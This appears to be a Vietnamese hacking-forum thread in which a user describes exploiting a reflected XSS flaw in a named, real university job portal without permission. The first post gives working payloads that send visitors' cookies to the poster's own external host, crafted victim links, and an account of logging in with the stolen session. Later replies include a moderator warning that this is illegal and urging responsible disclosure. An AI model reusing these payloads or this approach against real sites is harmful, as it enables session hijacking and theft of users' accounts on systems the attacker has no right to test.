Tôi đã hack Cổng Thông Tin Việc Làm Trường Đại Học Công Nghiệp Thực Phẩm như thế nào

Thảo luận trong 'Web Security' bắt đầu bởi DdosFulzac, 04/07/19, 01:07 AM.

  1. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 11
    Đã được thích: 3
    Điểm thành tích:
    3
    Cũng như bữa tối khoảng 23h15 như thường ngày lên youtube coi ba cái video hài hài , rồi nhớ ra còn 2 môn thi rồi chưa có điểm nên vô website nhà trường coi điểm mà chưa có lâu vcl vô tình thấy Cổng Thông Tin Việc Làm cho sinh viên.
    [​IMG]
    Click thử coi dù gì cũng đang cần tiền để dành mua xe :)) tìm thử xem có công việc nào không , được một lúc cái tính tò mò nổi lên sao không thử xem website có bị dính lỗi bảo mật không ta , bắt đầu tìm kiếm từ khóa kkk

    Coi view-source xem nào từ khóa kkk xuất hiện khá nhiều
    [​IMG]
    Bắt tay check xss với đoạn code huyền thoại <script>alert("1")</script>
    bỏ nó vô khung tìm kiếm thui
    [​IMG]
    Mất bà nó cặp thẻ <script></script> còn lại alert1 @@.....ta thử cách khác xem đem cặp thẻ <script>alert("1")</script> chèn vô url thử xem
    [​IMG]
    Tada !! Ngon chuẩn bị kịch bản lấy cookie thử xem nào.Ở đây mình có có sẵn còn bạn nào cần thì Google!! nha
    <script>window.location='http://ddosfulzac.000webhostapp.com/2.php?1='+document.cookie;</script>
    Chèn vô đưa cho victim click thôi (victim chính tôi lun :)) )
    http://vieclam.hufi.edu.vn/viec-lam...p.com/2.php?1='+document.cookie;</script>+-vi
    Trời đ****** !!!!
    [​IMG]
    giờ ta sẽ tạo file js chứa nội dung: window.location='http://ddosfulzac.000webhostapp.com/2.php?1='+document.cookie;
    rùi ta tiến hành gửi link cho victim:
    http://vieclam.hufi.edu.vn/viec-lam-<script src="http://ddosfulzac.000webhostapp.com/3.js"></script>+-vi
    [​IMG]
    Heeee lấy cookie của victim rùi :DD dùm editor cookie để đăng nhập thui
    [​IMG]
    Video Khai Thác Lỗi:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. Linh.Nguyễn.1

    Linh.Nguyễn.1 New Member

    Tham gia: 03/06/19, 08:06 PM
    Bài viết: 4
    Đã được thích: 0
    Điểm thành tích:
    1
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 11
    Đã được thích: 3
    Điểm thành tích:
    3
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. Baby_parrot

    Baby_parrot Member

    Tham gia: 17/04/18, 02:04 PM
    Bài viết: 51
    Đã được thích: 26
    Điểm thành tích:
    18
    Cảm ơn bạn đưa lên 1 case thực tế BQT biết bạn đưa lên với mục đích học tập nhưng có 1 số vấn đề sau bạn cần lưu ý:
    - Theo luật thì bạn đang vi phạm luật an ninh mạng
    - Bạn có thể không có mục đích xấu nhưng có thể bài khai thác của bạn sẽ bị kẻ xấu lợi dụng để tấn công thực tế gây hậu quả cho đơn vị chủ quản website này
    BQT rất hoan nghênh việc bạn report lỗ hổng cho đơn vị chủ quản để sửa lỗi. Và sau khi chắc chắn bên đơn vị chủ quản sửa lỗi và được sự đồng ý thì mới đăng writeup để tránh kẻ xấu lợi dụng. Giống như hành động của hacker mũ trắng đi tìm kiếm lỗ hổng vì mục đích tốt cho cả cộng đồng. Thân!
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. lochv37

    lochv37 W-------

    Tham gia: 05/01/15, 03:01 PM
    Bài viết: 45
    Đã được thích: 28
    Điểm thành tích:
    18
    vi phạm khoản nào nhỉ
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 11
    Đã được thích: 3
    Điểm thành tích:
    3
    Mình có gửi mail với bên họ về việc website họ có lỗ bảo mật rồi
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan